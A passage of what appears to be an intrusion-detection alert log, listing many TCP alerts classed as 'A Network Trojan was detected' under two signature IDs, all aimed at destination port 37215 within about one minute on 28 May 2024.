          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.668979
          SID:2835222
          Source Port:46432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.177736
          SID:2835222
          Source Port:35110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.850013
          SID:2835222
          Source Port:60120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597185
          SID:2829579
          Source Port:40572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077708
          SID:2835222
          Source Port:57708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147392
          SID:2835222
          Source Port:41618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818402
          SID:2829579
          Source Port:39042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.056905
          SID:2835222
          Source Port:49062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147298
          SID:2829579
          Source Port:34484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.437760
          SID:2835222
          Source Port:44212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178528
          SID:2829579
          Source Port:49838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.472100
          SID:2829579
          Source Port:57558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772150
          SID:2829579
          Source Port:44684
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.247668
          SID:2829579
          Source Port:56958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.806656
          SID:2829579
          Source Port:35238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.729352
          SID:2829579
          Source Port:56702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.299853
          SID:2835222
          Source Port:57992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.180545
          SID:2829579
          Source Port:41462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.865402
          SID:2835222
          Source Port:40880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066086
          SID:2829579
          Source Port:42030
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.191714
          SID:2835222
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.793588
          SID:2835222
          Source Port:58268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.942281
          SID:2829579
          Source Port:36462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536803
          SID:2829579
          Source Port:46176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.994844
          SID:2835222
          Source Port:43618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613631
          SID:2829579
          Source Port:43204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.680331
          SID:2829579
          Source Port:60116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907901
          SID:2835222
          Source Port:38478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.741667
          SID:2835222
          Source Port:55054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.337203
          SID:2829579
          Source Port:47986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.767163
          SID:2829579
          Source Port:34204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.239660
          SID:2835222
          Source Port:44720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.818703
          SID:2829579
          Source Port:40650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.285194
          SID:2835222
          Source Port:43618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.989746
          SID:2835222
          Source Port:50748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.095752
          SID:2835222
          Source Port:40740
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.203079
          SID:2829579
          Source Port:36354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.223156
          SID:2829579
          Source Port:43312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.116438
          SID:2829579
          Source Port:52634
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248028
          SID:2829579
          Source Port:41778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.739671
          SID:2829579
          Source Port:46022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807176
          SID:2835222
          Source Port:55040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066252
          SID:2835222
          Source Port:44790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202993
          SID:2835222
          Source Port:60562
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.155598
          SID:2835222
          Source Port:46990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889861
          SID:2829579
          Source Port:33174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.284917
          SID:2835222
          Source Port:57778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268670
          SID:2829579
          Source Port:52346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.978385
          SID:2835222
          Source Port:54836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.593000
          SID:2835222
          Source Port:43736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272339
          SID:2835222
          Source Port:38084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667880
          SID:2835222
          Source Port:46742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.819778
          SID:2829579
          Source Port:36248
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913860
          SID:2829579
          Source Port:47946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.651470
          SID:2835222
          Source Port:45594
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.291944
          SID:2835222
          Source Port:49832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.326122
          SID:2835222
          Source Port:48780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.000772
          SID:2835222
          Source Port:35324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.168088
          SID:2829579
          Source Port:38540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.627727
          SID:2835222
          Source Port:33396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.839723
          SID:2829579
          Source Port:36720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891714
          SID:2829579
          Source Port:47142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.795229
          SID:2835222
          Source Port:51812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.890365
          SID:2829579
          Source Port:37872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.299387
          SID:2835222
          Source Port:47750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320970
          SID:2835222
          Source Port:42590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176410
          SID:2829579
          Source Port:53010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.669509
          SID:2829579
          Source Port:39050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.216550
          SID:2829579
          Source Port:42256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652801
          SID:2829579
          Source Port:37934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.965191
          SID:2835222
          Source Port:42802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.123859
          SID:2835222
          Source Port:49018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.298100
          SID:2835222
          Source Port:55276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710197
          SID:2835222
          Source Port:33054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.846874
          SID:2835222
          Source Port:50418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463528
          SID:2829579
          Source Port:60974
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.866652
          SID:2829579
          Source Port:56246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667028
          SID:2829579
          Source Port:45384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044505
          SID:2835222
          Source Port:44514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202204
          SID:2835222
          Source Port:41292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590571
          SID:2835222
          Source Port:52076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890080
          SID:2829579
          Source Port:59538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977900
          SID:2835222
          Source Port:34112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.161771
          SID:2829579
          Source Port:58924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.268554
          SID:2829579
          Source Port:38024
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.766143
          SID:2829579
          Source Port:57168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.857332
          SID:2835222
          Source Port:38520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475901
          SID:2829579
          Source Port:55364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.889853
          SID:2835222
          Source Port:34472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.745936
          SID:2835222
          Source Port:44000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.664503
          SID:2835222
          Source Port:55554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.093754
          SID:2835222
          Source Port:57312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.660401
          SID:2835222
          Source Port:51762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.067541
          SID:2829579
          Source Port:57266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.436074
          SID:2829579
          Source Port:59476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.477794
          SID:2835222
          Source Port:43002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.664747
          SID:2835222
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484446
          SID:2835222
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594375
          SID:2835222
          Source Port:50932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.684310
          SID:2829579
          Source Port:39556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959741
          SID:2829579
          Source Port:33862
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298286
          SID:2835222
          Source Port:41268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.487028
          SID:2829579
          Source Port:35038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.613892
          SID:2835222
          Source Port:40534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.974008
          SID:2835222
          Source Port:33122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.551050
          SID:2835222
          Source Port:44536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.730314
          SID:2829579
          Source Port:60390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.230147
          SID:2835222
          Source Port:48302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.152514
          SID:2835222
          Source Port:44358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.665237
          SID:2835222
          Source Port:43338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.848639
          SID:2835222
          Source Port:48590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209356
          SID:2829579
          Source Port:51000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.234027
          SID:2835222
          Source Port:58452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.667685
          SID:2829579
          Source Port:48002
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977065
          SID:2835222
          Source Port:40896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594384
          SID:2829579
          Source Port:49196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.124684
          SID:2829579
          Source Port:58396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.438237
          SID:2829579
          Source Port:38102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.548704
          SID:2835222
          Source Port:56254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717962
          SID:2829579
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.650299
          SID:2835222
          Source Port:51380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399704
          SID:2835222
          Source Port:55484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.188959
          SID:2829579
          Source Port:55630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.998427
          SID:2835222
          Source Port:52144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.176454
          SID:2829579
          Source Port:48244
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.182244
          SID:2829579
          Source Port:56588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.953536
          SID:2835222
          Source Port:46334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341351
          SID:2829579
          Source Port:57996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336927
          SID:2835222
          Source Port:37120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141602
          SID:2829579
          Source Port:53186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399324
          SID:2835222
          Source Port:56990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890041
          SID:2829579
          Source Port:36128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.221532
          SID:2829579
          Source Port:34042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.592900
          SID:2835222
          Source Port:60106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.061836
          SID:2829579
          Source Port:49290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213687
          SID:2835222
          Source Port:57438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.794940
          SID:2835222
          Source Port:46914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.178965
          SID:2835222
          Source Port:47610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.932713
          SID:2835222
          Source Port:49066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.807538
          SID:2835222
          Source Port:53724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.527388
          SID:2829579
          Source Port:33726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.715256
          SID:2829579
          Source Port:40014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.997099
          SID:2829579
          Source Port:49250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102266
          SID:2835222
          Source Port:44662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215278
          SID:2829579
          Source Port:33268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594505
          SID:2835222
          Source Port:43094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542098
          SID:2829579
          Source Port:40928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269203
          SID:2829579
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.066602
          SID:2835222
          Source Port:51828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.497101
          SID:2829579
          Source Port:51038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.768856
          SID:2829579
          Source Port:43978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.296401
          SID:2835222
          Source Port:59054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.329598
          SID:2835222
          Source Port:56858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.117212
          SID:2835222
          Source Port:52384
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.932634
          SID:2835222
          Source Port:36256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.248028
          SID:2829579
          Source Port:38836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.975201
          SID:2829579
          Source Port:34732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466262
          SID:2835222
          Source Port:56748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228406
          SID:2829579
          Source Port:47628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.562899
          SID:2835222
          Source Port:53800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.403160
          SID:2829579
          Source Port:34932
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.717991
          SID:2829579
          Source Port:46144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652355
          SID:2829579
          Source Port:57306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197301
          SID:2835222
          Source Port:56870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.804633
          SID:2829579
          Source Port:48858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.216369
          SID:2829579
          Source Port:37464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.868959
          SID:2829579
          Source Port:49682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542314
          SID:2835222
          Source Port:57458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922339
          SID:2829579
          Source Port:48698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594277
          SID:2835222
          Source Port:50134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764053
          SID:2835222
          Source Port:43574
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.338404
          SID:2829579
          Source Port:45486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.590852
          SID:2835222
          Source Port:36798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671771
          SID:2835222
          Source Port:37294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299540
          SID:2835222
          Source Port:56314
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.184123
          SID:2829579
          Source Port:58222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774315
          SID:2835222
          Source Port:40122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959672
          SID:2829579
          Source Port:54830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.538828
          SID:2835222
          Source Port:39802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.594734
          SID:2829579
          Source Port:45556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.227245
          SID:2829579
          Source Port:59276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299645
          SID:2835222
          Source Port:44582
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977368
          SID:2829579
          Source Port:55772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.933182
          SID:2835222
          Source Port:46164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.484298
          SID:2829579
          Source Port:57474
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591391
          SID:2835222
          Source Port:55624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401585
          SID:2835222
          Source Port:55252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322265
          SID:2835222
          Source Port:44476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105638
          SID:2829579
          Source Port:44658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.549483
          SID:2829579
          Source Port:47794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.044520
          SID:2829579
          Source Port:40690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.402260
          SID:2829579
          Source Port:33342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.248160
          SID:2835222
          Source Port:48658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.689770
          SID:2835222
          Source Port:41114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.228317
          SID:2829579
          Source Port:43814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.173034
          SID:2829579
          Source Port:49654
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350450
          SID:2829579
          Source Port:42168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
